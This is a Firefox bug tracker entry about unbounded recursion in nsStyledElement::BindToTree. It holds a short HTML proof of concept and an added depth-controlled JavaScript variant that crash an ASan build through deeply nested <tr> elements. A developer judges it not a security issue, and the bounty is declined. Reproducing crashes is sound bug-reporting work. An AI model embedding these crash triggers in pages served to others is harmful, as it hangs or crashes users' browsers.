Open Bug 1809375 Opened 2 years ago Updated 4 months ago

Infinite recursion in nsStyledElement::BindToTree

Categories

(Core :: DOM: Core & HTML, defect)


People

(Reporter: eternalsakuraalpha, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

Attached file asan.log

===============
FIREFOX VERSION:

author	Ben Hearsum <bhearsum@mozilla.com>
Mon, 09 Jan 2023 18:01:10 +0000 (10 hours ago)
changeset 648462	329b80a0d03371363bd785a9a26cbda7433dd20a
parent 648461	702085eca7a199d7b5ef1c44006b621b85dcccb6
push id	40538
push user	mlaza@mozilla.com
push date	Mon, 09 Jan 2023 21:21:01 +0000 (7 hours ago)
treeherder	mozilla-central@329b80a0d033
reviewers	mkaply
bugs	1807926
milestone	110.0a1

===============
OS: Linux

===============
STEPS TO REPRODUCE:

  1. Run
    fuzzfetch -a -n firefox-asan or fuzzfetch --build 329b80a0d03371363bd785a9a26cbda7433dd20a --asan
    to download the latest Firefox.
  2. Simply run firefox poc.html to trigger the AddressSanitizer abort.

POC

<html>
<script>
// Recurse until the JS engine throws (too much recursion); the deepest frame
// swallows the error and returns a leaf <tr>. Unwinding then appends a
// progressively deeper <tr> subtree at each level, so the resulting chain is
// as deep as the JS stack allowed.
function func() {
  var tr = document.createElement("tr");
  try {
      var child = func();
      tr.appendChild(child);
  } catch (e) {}

  return tr;
}
func()
</script>
</html>

===============
AddressSanitizer Log

See attachment below.

Flags: sec-bounty?
Attachment #9311502 - Attachment mime type: text/x-log → text/plain
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Core & HTML
Product: Firefox → Core

This isn't a security issue. The test case just causes some kind of infinite recursion. In a regular browser build, it just kind of sits there, using up 100% CPU. Maybe in an ASan build it runs out of stack faster because the stack frames are bigger.

Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Trigger AddressSanitizer stack-overflow on firefox → Infinite recursion in nsStyledElement::BindToTree
Group: dom-core-security
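A controlled-depth variant of the reporter's PoC, added here as an example (it is not the attached testcase and not Mozilla code). The original builds the chain bottom-up through JS recursion, so every appendChild binds an ever-deeper subtree and the JS and native stacks overflow together. This version builds the chain iteratively and top-down, where each appendChild binds a single leaf, and only the final appendChild to document.body hands Gecko a subtree of a chosen depth, which is the one call that recurses through BindToTree. That makes it possible to bisect the depth at which an ASan build dies while an opt build survives. The helper names (buildChain, chainDepth, attachChain, StandInElement), the default depth and the ?depth= query parameter are my own choices; outside a browser a minimal stand-in element replaces the DOM so the builder can be exercised offline.

```javascript
// Added example, not the reporter's PoC or Mozilla code. Builds the <tr>
// chain iteratively (no JS recursion) and attaches it in one call, so the
// depth of the native BindToTree recursion is chosen explicitly.

// Minimal stand-in used when no DOM is available (e.g. under Node). A chain
// has at most one child per node, so firstChild is all that is tracked.
class StandInElement {
  constructor(tagName) {
    this.tagName = tagName;
    this.firstChild = null;
    this.parentNode = null;
  }
  appendChild(child) {
    child.parentNode = this;
    this.firstChild = child;
    return child;
  }
}

const doc = typeof document !== "undefined"
  ? document
  : {
      body: new StandInElement("body"),
      createElement: (tag) => new StandInElement(tag),
    };

// Build a chain of `depth` nested elements top-down; the root is returned
// detached, and each appendChild along the way binds exactly one leaf.
function buildChain(depth, tag = "tr") {
  if (!Number.isInteger(depth) || depth < 1) {
    throw new RangeError("depth must be an integer >= 1");
  }
  const root = doc.createElement(tag);
  let cur = root;
  for (let i = 1; i < depth; i++) {
    const next = doc.createElement(tag);
    cur.appendChild(next);
    cur = next;
  }
  return root;
}

// Count nodes along the firstChild axis, iteratively (no recursion here).
function chainDepth(node) {
  let n = 0;
  for (let cur = node; cur; cur = cur.firstChild) n++;
  return n;
}

// Attach a chain of the given depth with a single appendChild. In Gecko this
// is the one BindToTree call that recurses `depth` levels deep. A JS-visible
// exception is reported; a native stack overflow is not catchable and simply
// crashes the content process, which is the signal the bisection looks for.
function attachChain(depth) {
  const root = buildChain(depth);
  try {
    doc.body.appendChild(root);
    return { depth, attached: true, error: null };
  } catch (e) {
    return { depth, attached: false, error: String(e) };
  }
}

// In a browser, probe one depth per page load: open the file as
// poc.html?depth=N and halve/double N until the ASan build crashes and the
// opt build does not. The default of 100000 is an arbitrary starting point.
if (typeof document !== "undefined") {
  const param = new URLSearchParams(location.search).get("depth");
  const depth = Number(param || 100000);
  console.log(attachChain(depth));
}
```

Because a native stack overflow kills the page rather than throwing, the probe is one depth per load; the console.log result only appears for depths the build survives, and the crash report (or the ASan log) covers the others.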

The severity field is not set for this bug.
:hsivonen, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(hsivonen)

I only saw a couple of crashes in the last week on crash-stats that even had nsStyledElement::BindToTree in the proto stack, so I don't think this is a common issue for users.

Severity: -- → S3
Flags: needinfo?(hsivonen)
Flags: sec-bounty? → sec-bounty-